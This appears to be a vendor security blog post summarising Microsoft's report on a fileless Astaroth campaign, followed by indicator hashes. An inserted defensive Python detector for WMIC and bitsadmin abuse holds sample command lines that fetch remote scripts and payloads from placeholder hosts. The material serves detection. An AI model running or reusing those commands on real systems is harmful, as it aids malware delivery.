Microsoft Discovers Fileless Malware Campaign Dropping Astaroth Info Stealer

The Microsoft Defender ATP Research Team released a report covering a malware campaign that dropped the Astaroth trojan into the memory of infected computers. This particular campaign was notable in its distribution method and complex attack chain. It used fileless distribution techniques to hide its activities from security solutions, and abused different legitimate Windows software features to spread quietly.

Discovered in 2017, Astaroth is known as an information stealer. It is capable of taking sensitive information from an affected user — account credentials, keystrokes, and other data — and sending it to the attacker.

During a standard telemetry review, a researcher from the Microsoft Defender ATP Research Team, Andrea Lelli, noted a spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script, which indicated a fileless technique being used. Upon further investigation, Lelli discovered the Astaroth campaign where attackers were attempting to install the malware directly in the memory of victim devices.

Lelli explains that the infection typically starts with a spam email carrying a malicious URL to a LNK shortcut file. If the shortcut is clicked, WMIC is run and enables the download and execution of JavaScript code. That code in turn abuses the Bitsadmin tool to download further payloads; the final payload is Astaroth. Lelli outlines the whole attack chain in the Microsoft report.

The malware campaign actually runs legitimate Windows tools, which will download additional code and then pass it on. This chain of action is executed in memory, without saving any files on the disk, making it a “fileless execution.” The fileless nature of the campaign makes it difficult for traditional antivirus tools to detect it, although more advanced security solutions are able to defend against such a threat.


Lelli notes that this malware campaign completely “lives off the land,” given that all files run during the attack chain are system tools. By abusing legitimate tools already present on the target system, it tries to disguise its actions as regular activity.
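The chain described above, run through legitimate system tools, is exactly what gives defenders something to look for in process-creation telemetry. As an added illustration of that detection angle (not code from the Microsoft report or from Trend Micro), the following Python script applies two simple rules to constructed process-creation events: WMIC invoked with a remote URL in its command line, and bitsadmin invoked with /transfer and a URL. It then correlates the two on the same host within a short window, which separates the living-off-the-land chain the article describes from isolated, ordinary administrative use of either tool. The Sysmon-like JSON-lines event shape, the hostnames, timestamps and example.invalid URLs are assumptions constructed for this example.

```python
import json
import re
from datetime import datetime, timedelta, timezone

# Constructed sample process-creation events in a Sysmon-like JSON-lines shape.
# These are NOT real telemetry and NOT the indicators from the report; hostnames,
# timestamps and the example.invalid URLs are placeholders.
SAMPLE_EVENTS = r"""
{"ts":"2019-07-08T10:00:01Z","host":"WS01","image":"C:\\Windows\\explorer.exe","parent":"C:\\Windows\\System32\\userinit.exe","cmd":"C:\\Windows\\explorer.exe"}
{"ts":"2019-07-08T10:00:05Z","host":"WS01","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","parent":"C:\\Windows\\explorer.exe","cmd":"wmic os get /format:http://example.invalid/x.xsl"}
{"ts":"2019-07-08T10:00:09Z","host":"WS01","image":"C:\\Windows\\System32\\bitsadmin.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmd":"bitsadmin /transfer job /download /priority high http://example.invalid/p.bin C:\\Users\\Public\\p.bin"}
{"ts":"2019-07-08T11:30:00Z","host":"WS02","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmd":"wmic logicaldisk get name,size"}
{"ts":"2019-07-08T12:00:00Z","host":"WS03","image":"C:\\Windows\\System32\\bitsadmin.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmd":"bitsadmin /transfer updates /download https://example.invalid/update.msi C:\\Temp\\update.msi"}
"""

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Each rule: (name, executable name to match, predicate over the command line).
# Both tools are legitimate; the signal is a remote URL on the command line.
RULES = [
    ("wmic_remote_script", "wmic.exe",
     lambda cmd: URL_RE.search(cmd) is not None),
    ("bitsadmin_download", "bitsadmin.exe",
     lambda cmd: "/transfer" in cmd.lower() and URL_RE.search(cmd) is not None),
]


def parse_events(text):
    """Parse JSON-lines process-creation events into dicts with UTC datetimes."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(ev)
    return events


def detect(events):
    """Apply the per-process rules; return one alert per matching event."""
    alerts = []
    for ev in events:
        name = basename(ev["image"])
        for rule, image_name, predicate in RULES:
            if name == image_name and predicate(ev["cmd"]):
                alerts.append({"rule": rule, "host": ev["host"], "ts": ev["ts"], "cmd": ev["cmd"]})
    return alerts


def correlate(alerts, window=timedelta(minutes=10)):
    """Raise severity when a WMIC remote-script alert is followed on the same host
    by a bitsadmin download within `window`: the tool-chaining pattern the article
    describes, rather than two unrelated admin-tool invocations."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], []).append(a)
    chains = []
    for host, host_alerts in by_host.items():
        host_alerts.sort(key=lambda a: a["ts"])
        for first in host_alerts:
            if first["rule"] != "wmic_remote_script":
                continue
            for later in host_alerts:
                if (later["rule"] == "bitsadmin_download"
                        and first["ts"] <= later["ts"] <= first["ts"] + window):
                    chains.append({"host": host, "start": first["ts"], "end": later["ts"]})
                    break
    return chains


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(f"{a['ts'].isoformat()} {a['host']} {a['rule']}: {a['cmd']}")
    for c in correlate(found):
        print(f"CHAIN on {c['host']}: WMIC remote script at {c['start'].time()} "
              f"followed by bitsadmin download at {c['end'].time()}")
```

On the constructed sample this yields three per-process alerts (WMIC and bitsadmin on WS01, bitsadmin on WS03) and one correlated chain, on WS01 only; the plain `wmic logicaldisk` query on WS02 is not flagged, and the lone bitsadmin transfer on WS03 stays a low-severity single alert because no WMIC remote-script event precedes it.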

This use of fileless techniques is not new. In fact, we saw an uptick in fileless events in 2018, and cybercriminals continue to use fileless techniques to update old malware.

But while fileless threats may not be as visible as more traditional ones, they leave telltale signs that can be detected by IT and security teams. Here are some ways enterprises can stay ahead of fileless threats:

To protect against fileless threats that use spam emails as vectors, enterprises can use the Trend Micro endpoint solutions Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions protect users and businesses from threats by detecting malicious files and spammed messages and blocking all related malicious URLs.

Indicators of Compromise

762f962251800b0028a90b53a50503558fff9116c43fccdab376a05fdd03e27e

9cef4e4b27b956035107ae36dac44fc4bd0ed8e1ae7ae58d10708bae3de636a0

536d9ff73c183f5a4cf5c230f898b4e5b938c7a8bbd343edf818d5114eaf6521

90dcef5b84678f4a9491a1520cf43e17de5b97e13a1ad5d5609438deb8cf2a40

e44548f0c7d26a6d11f3ab29753e36f525559dc2e443bff96346f1be17cd644a

dcc9ba0819601b18b18e2594bca7e700938dfe85c6904feed1841852016decdb

6f8692f08ccd5ab46136fca179be23f67bffed8bbd61ea16276be4268db404f2

3e70e0c3a10855aa6f8bf13391ce91bdefcd78a7c3e67c93c0e6e040088d604f

d64d1c73460746d08e45fd97f29d1e464809fcfc869d3a6831b90897ca99e83c

314befd15c890bdec036ccfeba1248417a0b204f49b342ac6727c07756ec9eae

8f2158344f9df9dd011a4e76749e4a8f46a556a4110b796561855c5bbabd766a
